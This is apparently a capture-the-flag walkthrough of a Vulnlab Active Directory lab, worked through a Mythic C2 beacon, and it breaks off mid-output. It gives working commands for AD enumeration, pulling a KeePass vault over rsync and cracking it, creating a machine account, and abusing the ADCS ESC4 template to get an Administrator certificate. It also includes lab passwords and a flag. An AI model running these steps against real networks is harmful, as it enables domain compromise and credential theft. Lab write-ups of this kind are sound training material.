POSTS

VULNLAB: Mythical

Mythical is a Medium-rated small active directory chain on Vulnlab in which we start with an already running Mythic C2 beacon on an internal system. It is designed to practice operating through a C2 framework in a modern, challenging windows environment.

VULNLAB: Mythical
7751 words · 37 min

Overview

  • Type Chains
  • OS Windows/Linux (Hybrid)
  • Severity Medium
  • Creator xct
  • Release date 2024 Nov 06
  • IP 10.10.175.197, 10.10.175.198, 10.10.175.199

Rule of Engagement (ROE)

Important
  • Give this chain at least 5 minutes to fully startup.
Note
  • Mythical got ransomwared last year - now they are more careful on where to store their backups and have also “fixed” the vulnerabilities that the attackers used last time.
  • In this assumed breach scenario, your job is to find if it’s still possible to compromise the environment.
  • Use the following credentials to login into the web interface of the c2 server that was setup inside the network of the client for compliance reasons:
    • mythic_admin:wG4jmjNcEcfmzv3QbEcJdSVTDEjCnX
    • Should you need to crack a password it will be in one of the smaller rockyou lists.

Enumeration

Start the instance via Discord and let’s go:

image

Nmap

$ nmap -sC -sV -Pn -p- --min-rate=1000 -T4 10.10.175.197

All 65535 scanned ports on 10.10.175.197 are in ignored states.
Not shown: 58869 filtered tcp ports (no-response), 6666 closed tcp ports (reset)

Nothing

$ nmap -sC -sV -Pn -p- --min-rate=1000 -T4 10.10.175.198

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 bc:72:4a:3b:63:c7:d1:38:91:bb:2f:de:09:33:22:aa (ECDSA)
|_  256 70:d1:de:e0:b6:a4:87:2f:01:6f:ac:91:4d:c8:67:0b (ED25519)
7443/tcp open  ssl/http nginx 1.25.5
| ssl-cert: Subject: organizationName=Mythic
| Not valid before: 2024-11-24T15:26:17
|_Not valid after:  2025-11-24T15:26:17
|_http-server-header: nginx/1.25.5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Found an Mythic C2 instance on port 7443/tcp on Linux machine

$ nmap -sC -sV -Pn -p- --min-rate=1000 -T4 10.10.175.199

PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc02.mythical-eu.vl
| Not valid before: 2024-11-28T15:12:23
|_Not valid after:  2025-05-30T15:12:23
| rdp-ntlm-info: 
|   Target_Name: MYTHICAL-EU
|   NetBIOS_Domain_Name: MYTHICAL-EU
|   NetBIOS_Computer_Name: DC02
|   DNS_Domain_Name: mythical-eu.vl
|   DNS_Computer_Name: dc02.mythical-eu.vl
|   DNS_Tree_Name: mythical-eu.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-12-07T03:21:11+00:00
|_ssl-date: 2024-12-07T03:21:15+00:00; -1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
  • Found a Domain Controller
  • Add dc02.mythical-eu.vl in /etc/hosts

MYTHIC C2 (7443/tcp)

Using mythic_admin:wG4jmjNcEcfmzv3QbEcJdSVTDEjCnX to login to the Mythic C2 instance using Chromium browser:

image

image

We can see that we have 2 active callbacks using Momo.Ayase account on DC01 with apollo agent, but only 1 still stay updated

image

We can see that the server has multi network interfaces:

image

Note

image

Check the Metadata:

Screenshot From 2024-12-08 18-31-27

image

  • Add dc01.mythical-us.vl in /etc/hosts
  • We have a session with Medium integrity

Right click to the callback agent to Interact with it and check which modules are available on this apollo agent:

image

help
Loaded Commands In Agent:

assembly_inject
	Usage: assembly_inject [pid] [assembly] [args]
	Description: Inject the unmanaged assembly loader into a remote process. The loader will then execute the .NET binary in the context of the injected process.
blockdlls
	Usage: blockdlls -block true|false
	Description: Block non-Microsoft DLLs from loading into sacrificial processes.
cat
	Usage: cat [file]
	Description: Print the contents of a file specified by [file]
cd
	Usage: cd [path]
	Description: Change directory to [path]. Path relative identifiers such as ../ are accepted.
cp
	Usage: cp [source] [dest]
	Description: Copy a file from one location to another.
dcsync
	Usage: dcsync -Domain [domain] -User [user]
	Description: Sync a user's Kerberos keys to the local machine.
download
	Usage: download -Path [path/to/file]
	Description: Download a file off the target system.
execute_assembly
	Usage: execute_assembly [Assembly.exe] [args]
	Description: Executes a .NET assembly with the specified arguments. This assembly must first be known by the agent using the `register_assembly` command.
execute_coff
	Usage: execute_coff -Coff [COFF.o] -Function [go] -Timeout [30] [-Arguments [optional arguments]]
	Description: Execute a COFF file in memory. This COFF must first be known by the agent using the `register_coff` command.
execute_pe
	Usage: execute_pe [PE.exe] [args]
	Description: Executes an unmanaged executable with the specified arguments. This executable must first be known by the agent using the `register_file` command.
exit
	Usage: exit
	Description: Task the implant to exit.
get_injection_techniques
	Usage: get_injection_techniques
	Description: List the currently available injection techniques the agent knows about.
getprivs
	Usage: getprivs
	Description: Enable as many privileges as we can on our current thread token.
ifconfig
	Usage: ifconfig
	Description: Get interface information associated with the target.
inject
	Usage: inject (modal popup)
	Description: Inject agent shellcode into a remote process.
inline_assembly
	Usage: inline_assembly [Assembly.exe] [args]
	Description: Executes a .NET assembly with the specified arguments in a disposable AppDomain. This assembly must first be known by the agent using the `register_assembly` command.
jobkill
	Usage: jobkill [jid]
	Description: Kill a job specified by the job identifier (jid).
jobs
	Usage: jobs
	Description: List currently executing jobs, excluding the "jobs" and "jobkill" commands.
jump_psexec
	Usage: jump_psexec hostname
	Description: Use sc to move laterally to a new host by first copying over apollo.exe.
jump_wmi
	Usage: jump_wmi hostname
	Description: Use wmiexecute to move laterally to a new host by first copying over apollo.exe.
keylog_inject
	Usage: keylog_inject [pid]
	Description: Start a keylogger in a remote process.
kill
	Usage: kill [pid]
	Description: Kill a process specified by [pid]
link
	Usage: link
	Description: Link to a new agent on a remote host or re-link back to a specified callback that's been unlinked via the `unlink` commmand.
load
	Usage: load [cmd1] [cmd2] [...]
	Description: Load one or more new commands into the agent.
ls
	Usage: ls [path]
	Description: List files and folders in a specified directory (defaults to your current working directory.)
make_token
	Usage: make_token -username domain\user -password abc123
	Description: Creates a new logon session and applies it to the agent. Modal popup for options and selecting an existing credential.
mimikatz
	Usage: mimikatz [command1] [command2] [...]
	Description: Execute one or more mimikatz commands (e.g. `mimikatz coffee sekurlsa::logonpasswords`).
mkdir
	Usage: mkdir [path]
	Description: Make a directory specified by [path]
mv
	Usage: mv [source] [dest]
	Description: Move a file from source to destination.
net_dclist
	Usage: net_dclist [domain]
	Description: Get domain controllers belonging to [domain]. Defaults to current domain.
net_localgroup
	Usage: net_localgroup [computer]
	Description: Get local groups of [computer]. Defaults to localhost.
net_localgroup_member
	Usage: net_localgroup_member [computer] [group]
	Description: Retrieve local group membership of the group specified by [group]. If [computer] is omitted, defaults to localhost.
net_shares
	Usage: net_shares [computer]
	Description: List remote shares and their accessibility of [computer]
netstat
	Usage: netstat
	Description: View netstat entries
powerpick
	Usage: powerpick [command]
	Description: Inject PowerShell loader assembly into a sacrificial process and execute [command].
powershell
	Usage: powershell [command]
	Description: Run a PowerShell command in the currently executing process.
powershell_import
	Usage: powershell_import (modal popup)
	Description: Import a new .ps1 into the agent cache.
ppid
	Usage: ppid [pid]
	Description: Change the parent process for post-ex jobs by the specified pid.
printspoofer
	Usage: printspoofer [args]
	Description: Execute one or more PrintSpoofer commands
ps
	Usage: ps
	Description: Get a brief process listing with basic information.
psinject
	Usage: psinject [pid] [command]
	Description: Executes PowerShell in the process specified by `[pid]`. Note: Currently stdout is not captured of child processes if not explicitly captured into a variable or via inline execution (such as `$(whoami)`).
pth
	Usage: pth -Domain [domain] -User [user] -NTLM [ntlm] [-AES128 [aes128] -AES256 [aes256] -Run [cmd.exe]]
	Description: Spawn a new process using the specified domain user's credential material.
pwd
	Usage: pwd
	Description: Print working directory.
reg_query
	Usage: reg_query [key]
	Description: Query registry keys and values for an associated registry key [key].
reg_write_value
	Usage: reg_write_value [key] [value_name] [new_value]
	Description: Write a new value to the [value_name] value under the specified registry key [key].

Ex: reg_write_value HKLM:\ '' 1234
register_assembly
	Usage: register_assembly (modal popup)
	Description: Import a new Assembly into the agent cache.
register_coff
	Usage: register_coff (modal popup)
	Description: Import a new COFF into the agent cache.
register_file
	Usage: register_assembly (modal popup)
	Description: Register a file to later use in the agent.
rev2self
	Usage: rev2self
	Description: Revert token to implant's primary token.
rm
	Usage: rm [path]
	Description: Delete a file specified by [path]
rpfwd
	Usage: rpfwd -Port 445 -RemoteIP 1.2.3.4 -RemotePort 80
	Description: Start listening on a port on the target host and forwarding traffic through Mythic to the remoteIP:remotePort. Stop this with the jobs and jobkill commands
run
	Usage: run [binary] [arguments]
	Description: Execute a binary on the target system. This will properly use %PATH% without needing to specify full locations.
sc
	Usage: sc
	Description: Service control manager wrapper function
screenshot
	Usage: screenshot
	Description: Take a screenshot of the current desktop.
screenshot_inject
	Usage: screenshot_inject [pid] [count] [interval]
	Description: Take a screenshot in the session of the target PID
set_injection_technique
	Usage: set_injection_technique [technique]
	Description: Set the injection technique used in post-ex jobs that require injection. Must be a technique listed in the output of `list_injection_techniques`.
shell
	Usage: shell [command] [arguments]
	Description: Run a shell command which will translate to a process being spawned with command line: `cmd.exe /C [command]`
shinject
	Usage: shinject (modal popup)
	Description: Inject shellcode into a remote process.
sleep
	Usage: sleep [seconds] [jitter]
	Description: Change the implant's sleep interval.
socks
	Usage: socks [port number]
	Description: Enable SOCKS 5 compliant proxy to send data to the target network. Compatible with proxychains and proxychains4.
spawn
	Usage: spawn (modal popup)
	Description: Spawn a new session in the executable specified by the spawnto_x86 or spawnto_x64 commands. The payload template must be shellcode.
spawnto_x64
	Usage: spawnto_x64 [path] [args]
	Description: Change the default binary used in post exploitation jobs to [path]. If [args] provided, the process is launched with those arguments.
spawnto_x86
	Usage: spawnto_x86 [path]
	Description: Change the default binary used in post exploitation jobs to [path]. If [args] provided, the process is launched with those arguments.
steal_token
	Usage: steal_token [pid]
	Description: Steal a primary token from another process. If no arguments are provided, this will default to winlogon.exe.
ticket_cache_add
	Usage: ticket_cache_add [b64Ticket] [luid]
	Description: Add a kerberos ticket to the current luid, or if elevated and a luid is provided load the ticket into that logon session instead. This modifies the tickets in the current logon session.
ticket_cache_extract
	Usage: ticket_cache_extract [service] [luid]
	Description: extract a ticket for the provided service name from the current or specified luid
ticket_cache_list
	Usage: ticket_cache_list [luid]
	Description: List all kerberos tickets in the current logon session, or if elevated list all tickets for all logon sessions, optionally while elevated a single luid can be provided to limit the enumeration
ticket_cache_purge
	Usage: ticket_cache_purge -serviceName=krbtgt/domain.com
	Description: Remove the specified ticket from the system. This modifies your current logon session tickets, so be careful if purging all.
ticket_store_add
	Usage: ticket_store_add [b64ticket]
	Description: Add a kerberos ticket to the agents internal ticket store. Tickets are injected into sacrificial processes when you're impersonating a token (make_token / steal_token). This is because you have a new logon session to put the tickets into without overriding your existing tickets. For safety, do a make_token with junk creds first.
ticket_store_list
	Usage: ticket_store_list [luid]
	Description: List all kerberos tickets in the agents ticket store, optionally a single luid can be provided to limit the items returned from the store
ticket_store_purge
	Usage: ticket_store_purge [b64ticket] [all]
	Description: Remove the specified ticket from the ticket store
unlink
	Usage: unlink (modal popup)
	Description: Unlinks a callback from the agent.
upload
	Usage: upload (modal popup)
	Description: Upload a file from the Mythic server to the remote host.
whoami
	Usage: whoami
	Description: Get the username associated with your current thread token.
wmiexecute
	Usage: wmiexecute [command] [host] [username] [password] [domain]
	Description: Use WMI to execute a command on the local or specified remote system, can also be given optional credentials to impersonate a different user.
help
	Usage: help [command]
	Description: The 'help' command gives detailed information about specific commands or general information about all available commands.
clear
	Usage: clear { | all | task Num}
	Description: The 'clear' command will mark tasks as 'cleared' so that they can't be picked up by agents

The agent has been compiled with all features

Enumerate a little bit user and group:

whoami
Local Identity: MYTHICAL-US\Momo.Ayase
Impersonation Identity: MYTHICAL-US\Momo.Ayase
getprivs
Impersonation identity enabled privileges:
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeMachineAccountPrivilege

Primary identity enabled privileges:
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeMachineAccountPrivilege
net_localgroup dc01
[
  {
    "comment": "Members can administer domain servers",
    "computer_name": "dc01",
    "group_name": "Server Operators",
    "sid": null
  },
  {
    "comment": "Members can administer domain user and group accounts",
    "computer_name": "dc01",
    "group_name": "Account Operators",
    "sid": null
  },
  {
    "comment": "A backward compatibility group which allows read access on all users and groups in the domain",
    "computer_name": "dc01",
    "group_name": "Pre-Windows 2000 Compatible Access",
    "sid": null
  },
  {
    "comment": "Members of this group can create incoming, one-way trusts to this forest",
    "computer_name": "dc01",
    "group_name": "Incoming Forest Trust Builders",
    "sid": null
  },
  {
    "comment": "Members of this group have access to the computed tokenGroupsGlobalAndUniversal attribute on User objects",
    "computer_name": "dc01",
    "group_name": "Windows Authorization Access Group",
    "sid": null
  },
  {
    "comment": "Members of this group can update user accounts in Active Directory with information about license issuance, for the purpose of tracking and reporting TS Per User CAL usage",
    "computer_name": "dc01",
    "group_name": "Terminal Server License Servers",
    "sid": null
  },
  {
    "comment": "Administrators have complete and unrestricted access to the computer/domain",
    "computer_name": "dc01",
    "group_name": "Administrators",
    "sid": null
  },
  {
    "comment": "Users are prevented from making accidental or intentional system-wide changes and can run most applications",
    "computer_name": "dc01",
    "group_name": "Users",
    "sid": null
  },
  {
    "comment": "Guests have the same access as members of the Users group by default, except for the Guest account which is further restricted",
    "computer_name": "dc01",
    "group_name": "Guests",
    "sid": null
  },
  {
    "comment": "Members can administer printers installed on domain controllers",
    "computer_name": "dc01",
    "group_name": "Print Operators",
    "sid": null
  },
  {
    "comment": "Backup Operators can override security restrictions for the sole purpose of backing up or restoring files",
    "computer_name": "dc01",
    "group_name": "Backup Operators",
    "sid": null
  },
  {
    "comment": "Supports file replication in a domain",
    "computer_name": "dc01",
    "group_name": "Replicator",
    "sid": null
  },
  {
    "comment": "Members in this group are granted the right to logon remotely",
    "computer_name": "dc01",
    "group_name": "Remote Desktop Users",
    "sid": null
  },
  {
    "comment": "Members in this group can have some administrative privileges to manage configuration of networking features",
    "computer_name": "dc01",
    "group_name": "Network Configuration Operators",
    "sid": null
  },
  {
    "comment": "Members of this group can access performance counter data locally and remotely",
    "computer_name": "dc01",
    "group_name": "Performance Monitor Users",
    "sid": null
  },
  {
    "comment": "Members of this group may schedule logging of performance counters, enable trace providers, and collect event traces both locally and via remote access to this computer",
    "computer_name": "dc01",
    "group_name": "Performance Log Users",
    "sid": null
  },
  {
    "comment": "Members are allowed to launch, activate and use Distributed COM objects on this machine.",
    "computer_name": "dc01",
    "group_name": "Distributed COM Users",
    "sid": null
  },
  {
    "comment": "Built-in group used by Internet Information Services.",
    "computer_name": "dc01",
    "group_name": "IIS_IUSRS",
    "sid": null
  },
  {
    "comment": "Members are authorized to perform cryptographic operations.",
    "computer_name": "dc01",
    "group_name": "Cryptographic Operators",
    "sid": null
  },
  {
    "comment": "Members of this group can read event logs from local machine",
    "computer_name": "dc01",
    "group_name": "Event Log Readers",
    "sid": null
  },
  {
    "comment": "Members of this group are allowed to connect to Certification Authorities in the enterprise",
    "computer_name": "dc01",
    "group_name": "Certificate Service DCOM Access",
    "sid": null
  },
  {
    "comment": "Servers in this group enable users of RemoteApp programs and personal virtual desktops access to these resources. In Internet-facing deployments, these servers are typically deployed in an edge network. This group needs to be populated on servers running RD Connection Broker. RD Gateway servers and RD Web Access servers used in the deployment need to be in this group.",
    "computer_name": "dc01",
    "group_name": "RDS Remote Access Servers",
    "sid": null
  },
  {
    "comment": "Servers in this group run virtual machines and host sessions where users RemoteApp programs and personal virtual desktops run. This group needs to be populated on servers running RD Connection Broker. RD Session Host servers and RD Virtualization Host servers used in the deployment need to be in this group.",
    "computer_name": "dc01",
    "group_name": "RDS Endpoint Servers",
    "sid": null
  },
  {
    "comment": "Servers in this group can perform routine administrative actions on servers running Remote Desktop Services. This group needs to be populated on all servers in a Remote Desktop Services deployment. The servers running the RDS Central Management service must be included in this group.",
    "computer_name": "dc01",
    "group_name": "RDS Management Servers",
    "sid": null
  },
  {
    "comment": "Members of this group have complete and unrestricted access to all features of Hyper-V.",
    "computer_name": "dc01",
    "group_name": "Hyper-V Administrators",
    "sid": null
  },
  {
    "comment": "Members of this group can remotely query authorization attributes and permissions for resources on this computer.",
    "computer_name": "dc01",
    "group_name": "Access Control Assistance Operators",
    "sid": null
  },
  {
    "comment": "Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.",
    "computer_name": "dc01",
    "group_name": "Remote Management Users",
    "sid": null
  },
  {
    "comment": "Members of this group have complete and unrestricted access to all features of Storage Replica.",
    "computer_name": "dc01",
    "group_name": "Storage Replica Administrators",
    "sid": null
  },
  {
    "comment": "Members of this group are permitted to publish certificates to the directory",
    "computer_name": "dc01",
    "group_name": "Cert Publishers",
    "sid": null
  },
  {
    "comment": "Servers in this group can access remote access properties of users",
    "computer_name": "dc01",
    "group_name": "RAS and IAS Servers",
    "sid": null
  },
  {
    "comment": "Members in this group can have their passwords replicated to all read-only domain controllers in the domain",
    "computer_name": "dc01",
    "group_name": "Allowed RODC Password Replication Group",
    "sid": null
  },
  {
    "comment": "Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain",
    "computer_name": "dc01",
    "group_name": "Denied RODC Password Replication Group",
    "sid": null
  },
  {
    "comment": "DNS Administrators Group",
    "computer_name": "dc01",
    "group_name": "DnsAdmins",
    "sid": null
  },
  {
    "comment": "",
    "computer_name": "dc01",
    "group_name": "OpenVPN Administrators",
    "sid": null
  }
]
net_localgroup_member -Computer dc01 -Group Administrators

image

net_localgroup_member -Computer dc01 -Group "Remote Desktop Users"

image

Momo.Ayase can RDP to DC01

We can get more information on this user using the command below (but OPSEC less because using a system command):

shell "net user Momo.Ayase"
User name                    momo.ayase
Full Name                    Momo Ayase
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            11/29/2024 7:11:38 AM
Password expires             Never
Password changeable          11/30/2024 7:11:38 AM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   12/7/2024 3:44:40 PM

Logon hours allowed          All

Local Group Memberships      *OpenVPN Administrator*Remote Desktop Users 
Global Group memberships     *Backup Admins        *Domain Users         
The command completed successfully.

Quick screenshot, just in case some notes, documents are currently open:

screenshot

2024-12-08 09_38_31 Z

BloodHound - mythical-us.vl

register_assembly

image

Click on Task

Change the folder location:

cd c:\windows\tasks

Execute SharpHound:

execute_assembly -Assembly SharpHound.exe -Arguments "-c All,LoggedOn"
2024-12-06T21:23:34.3924217-08:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2024-12-06T21:23:34.6578401-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2024-12-06T21:23:34.7046728-08:00|INFORMATION|Initializing SharpHound at 9:23 PM on 12/6/2024
2024-12-06T21:23:34.7515339-08:00|INFORMATION|Resolved current domain to mythical-us.vl
2024-12-06T21:23:34.9859241-08:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, CertServices
2024-12-06T21:23:35.1266084-08:00|INFORMATION|Beginning LDAP search for mythical-us.vl
2024-12-06T21:23:35.2671962-08:00|INFORMATION|Beginning LDAP search for mythical-us.vl Configuration NC
2024-12-06T21:23:35.3140571-08:00|INFORMATION|Producer has finished, closing LDAP channel
2024-12-06T21:23:35.3140571-08:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-12-06T21:23:35.3453600-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for MYTHICAL-US.VL
2024-12-06T21:23:35.6899042-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for MYTHICAL-US.VL
2024-12-06T21:23:36.3458558-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for MYTHICAL-US.VL
2024-12-06T21:23:36.8766601-08:00|INFORMATION|Consumers finished, closing output channel
2024-12-06T21:23:36.9234273-08:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-12-06T21:23:37.8298277-08:00|INFORMATION|Status: 364 objects finished (+364 182)/s -- Using 90 MB RAM
2024-12-06T21:23:37.8298277-08:00|INFORMATION|Enumeration finished in 00:00:02.7213254
2024-12-06T21:23:38.0484867-08:00|INFORMATION|Saving cache with stats: 18 ID to type mappings.
 2 name to SID mappings.
 1 machine sid mappings.
 4 sid to domain mappings.
 0 global catalog mappings.
2024-12-06T21:23:38.1109857-08:00|INFORMATION|SharpHound Enumeration Completed at 9:23 PM on 12/6/2024! Happy Graphing!
ls

image

Download the output:

Screenshot From 2024-12-07 14-27-05

download \\DC01\C:\Windows\Tasks\20241206212336_BloodHound.zip

Delete the SH output file:

rm \\DC01\C:\Windows\Tasks\20241206212336_BloodHound.zip

Ingest to BloodHound CE and start analysis:

Momo Ayase:

image

image

image

Momo is member of Backup Admins, OpenVPN Administrators group and can RDP to DC01 then DCSync to the Domain MYTHICAL-US.VL

Domain Admins:

image

Trusted Domains:

image

The domain MYTHICAL-EU.VL is trusted by the domain MYTHICAL-US.VL

Found ADCS ESC4 and the vulnerable template MACHINE:

image

image

Information gathering

We continue the enumeration checking folders and files on the DC01:

image

Found 2 folders not present by default: _admin and _install

List both:

ls \\DC01\C:\_admin

image

ls \\DC01\C:\_admin\cwrsync

image

Found some stuff related to Rsync and as we know that Momo.Ayase is member of Backup Admins group then that should be good to dig more if we can find any backup somewhere

Download the command file:

download \\DC01\C:\_admin\cwrsync\cwrsync.cmd

image

Nothing interesting

ls \\DC01\C:\_install

image

Found sqlcmd-amd.msi, a SQL utility tool

Check the network interfaces:

ifconfig

image

DC01 is connected to a VPN with IP 192.168.25.2

Let’s scan this network segment, we will focus on 873/tcp only because Rsync can run as a daemon ( rsyncd ) listening on default port 873 for incoming connections.

Apollo has been compiled with Socks5 module but we can’t use it as listening only on the loopback interface.

As needed a break then we launch a new instance and update our /etc/hosts accordingly:

image

We compiled and created a static binary Nmap then upload in Mythic C2:

register_assembly

image

Reduce the sleep to 2s to increase the reactivity of the agent:

sleep 2 -1

Then let’s scan:

execute_assembly -Assembly nmap.exe -Arguments "-sT -p 873 --open 192.168.25.0/24"
Nmap scan report for 192.168.25.1
Host is up (0.00s latency).

PORT      STATE    SERVICE
873/tcp   open     rsync

192.168.25.1 is the host where the backup is done as rsync port is open

Other possibilities:

register_assembly PortScanner.exe
execute_assembly -Assembly PortScanner.exe -Arguments "hosts=192.168.25.1 ports=873 timeout=2000"
192.168.25.1 : port 873 is opening
[Notification] All unlisted ports are not open, nor timed out
[Notification] Scanner complete.
upload -File rustscan.exe
Uploaded 4450816 bytes to C:\ProgramData\1\rustscan.exe on DC01
run -Executable C:\programdata\1\rustscan.exe -Arguments "-a 192.168.25.1 -p 873"
Open 192.168.25.1:873

We can extend to all ports too:

run -Executable C:\programdata\1\rustscan.exe -Arguments "-a 192.168.25.1"
Open 192.168.25.1:22
Open 192.168.25.1:80
Open 192.168.25.1:873
Open 192.168.25.1:7443

Then rescan all of our 3 machines from internal side:

DC01:

run -Executable C:\programdata\1\rustscan.exe -Arguments -a 10.10.140.37
Open 10.10.140.37:88
Open 10.10.140.37:139
Open 10.10.140.37:53
Open 10.10.140.37:135
Open 10.10.140.37:389
Open 10.10.140.37:445
Open 10.10.140.37:464
Open 10.10.140.37:593
Open 10.10.140.37:636
Open 10.10.140.37:3268
Open 10.10.140.37:3269
Open 10.10.140.37:3389
Open 10.10.140.37:5985
Open 10.10.140.37:9389

MYTHIC Machine:

run -Executable C:\programdata\1\rustscan.exe -Arguments -a 10.10.140.38
Open 10.10.140.38:22
Open 10.10.140.38:80
Open 10.10.140.38:7443

DC02:

run -Executable C:\programdata\1\rustscan.exe -Arguments -a 10.10.140.39
Open 10.10.140.39:53
Open 10.10.140.39:88
Open 10.10.140.39:135
Open 10.10.140.39:139
Open 10.10.140.39:389
Open 10.10.140.39:445
Open 10.10.140.39:464
Open 10.10.140.39:593
Open 10.10.140.39:636
Open 10.10.140.39:1433
Open 10.10.140.39:3389
Open 10.10.140.39:3268
Open 10.10.140.39:3269
Open 10.10.140.39:5985
Open 10.10.140.39:9389
Open 10.10.140.39:49664
Open 10.10.140.39:49667
Open 10.10.140.39:49668
Open 10.10.140.39:49670
Open 10.10.140.39:49671

Not so common on a DC, but 1433/tcp is also open (MSSQL)

Data recovering via RSYNC (Mythical_User-1)

Let’s go back to the folder where rsync.exe is present:

cd C:\_admin\cwrsync\bin

List remote files:

run -Executable rsync.exe -Arguments "-av --list-only rsync://192.168.25.1:873"
mythical       	Domain Backups

or

shell "rsync.exe -av --list-only rsync://192.168.25.1:873"

List files under mythical folder:

run -Executable rsync.exe -Arguments "-av --list-only rsync://192.168.25.1:873/mythical"
receiving incremental file list
drwxr-xr-x          4,096 2024/11/29 08:04:42 .
-rw-r--r--             37 2024/11/29 07:39:26 flag.txt
-rw-r--r--          1,605 2024/11/29 07:49:51 it.kdbx

sent 20 bytes  received 88 bytes  216.00 bytes/sec
total size is 1,642  speedup is 15.20

Create a folder to retrieve the files:

mkdir -Path 1
Created C:\_admin\cwrsync\bin\1

Grab the 1st flag ``:

run -Executable rsync.exe -Arguments "-av rsync://192.168.25.1:873/mythical/flag.txt ./1"

Grab the Keepass vault:

run -Executable rsync.exe -Arguments "-av rsync://192.168.25.1:873/mythical/it.kdbx ./1"

Read the Mythical_User-1 flag:

cat C:\_admin\cwrsync\bin\1\flag.txt
VL{8fd64f00badd311cf870b34f1056f0bd}

Download the KeePass vault:

download \\DC01\C:\_admin\cwrsync\bin\1\it.kdbx

Delete our folder:

rm \\DC01\C:\_admin\cwrsync\bin\1

KeePass vault brute-forcing

Try to crack it via JohnTheRipper:

$ keepass2john it.kdbx | tee it.hash    
! it.kdbx : File version '40000' is currently not supported!

Failed because KeePass v4.x is not supported

Using keepass4brute, we can crack it with Rockyou list (following the Hint from xct in the Chain’s rules):

$ git clone https://github.com/r3nt0n/keepass4brute.git
$ ./keepass4brute/keepass4brute.sh it.kdbx /usr/share/wordlists/rockyou.txt 
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute

[+] Words tested: 951/14344392 - Attempts per minute: 535 - Estimated time remaining: 2 weeks, 3 days
[+] Current attempt: 741852

[*] Password found: 741852
  • Take a お茶 🍵🗾 and wait a moment
  • A few moment later, we found 741852

Unlock it:

image

Found domjoin:hKvhexY5BtAgtWAY with indicator Root / domjoin

ADCS ESC4 exploiting (Mythical_User-2)

Summary of what ESC4 is:

  • A misconfiguration in the ESC4 certificate template allows users with low privileges to modify a template, which can be utilized by making it vulnerable to ESC1/ESC2/ESC3 and requesting an administrator certificate.
  • In other words, if a domain user has these permissions over a template: Owner, WriteOwnerPrincipals, WriteDaclPrincipals and WritePropertyPrincipals, they can abuse it to perform ESC1 and become Domain admin.

We discovered previously that Domain Computers can ESC4 to the MYHICAL-US.VL domain, so let’s try to use domjoin to create a new computer object:

  1. Create a new stored credential:

image

image

  1. Launch a new becon as ‘Domjoin’, to do not alter the current Momo.Ayase session:

Download the same apollo payload:

image

Then upload it and execute is as Domjoin:

upload

Click on ENTER key

image

shell c:\programdata\1\apollo.exe

Got a new callback then change the description to avoid confusion (previous for Momo.Ayase and this new one for Domjoin):

image

  1. Create a token as domjoin:
make token

Click on ENTER key

image

OR manually:

make_token -username mythical-us.vl\domjoin -password hKvhexY5BtAgtWAY
Successfully impersonated MYTHICAL-US\Momo.Ayase

Double check:

whoami
Local Identity: MYTHICAL-US\Momo.Ayase
Impersonation Identity: mythical-us.vl\domjoin
  1. Download PowerMad:
$ git clone https://github.com/Kevin-Robertson/Powermad.git
  1. Import it in PowerShell commands in our Mythic session:
cd c:\programdata\1
powershell_import

Click on ENTER key

image

  1. Create a new Machine Account via domjoin’s token:
powershell $password=ConvertTo-SecureString 'Azerty1234!' -AsPlainText -Force; New-MachineAccount -machineaccount FromRPWNWithLove -Password $($password)
[+] Machine account FromRPWNWithLove added

Now, we will impersonate our new Domain Computer FromRPWNWithLove$:

To keep also the Domjoin session, we will proceed in the same previous way to create a new session as FromRPWNWithLove$:

make_token -username mythical-us.vl\FromRPWNWithLove -password Azerty1234!

Double check:

Local Identity: MYTHICAL-US\Momo.Ayase
Impersonation Identity: mythical-us.vl\FromRPWNWithLove

Import PowerView in PowerShell commands in this new Mythic session:

cd c:\programdata\1
powershell_import

image

Add ENROLLEE_SUPPLIES_SUBJECT to the vulnerable template:

$templateName = "Machine"; $caServer = "mythical-us-DC01-CA"; Import-Module ActiveDirectory; $template = Get-ADObject -LDAPFilter "(cn=$templateName)" -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mythical-us,DC=vl"; $currentFlag = $template."mspki-certificate-name-flag"; $newFlag = $currentFlag -bor 0x00000001; Set-ADObject -Identity $template -Replace @{ "mspki-certificate-name-flag" = $newFlag };

Add Domain Users group to the Enrollment Rights:

powershell Add-DomainObjectAcl -TargetIdentity Machine -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=mythical-us,DC=vl" -Verbose

Upload certify.exe:

upload

image

Then get the certificate of an Administrator:

run  -Executable Certify.exe -Arguments "request /ca:dc01.mythical-us.vl\mythical-us-DC01-CA /template:Machine /altname:Administrator"

   _____          _   _  __              
  / ____|        | | (_)/ _|             
 | |     ___ _ __| |_ _| |_ _   _        
 | |    / _ \ '__| __| |  _| | | |      
 | |___|  __/ |  | |_| | | | |_| |       
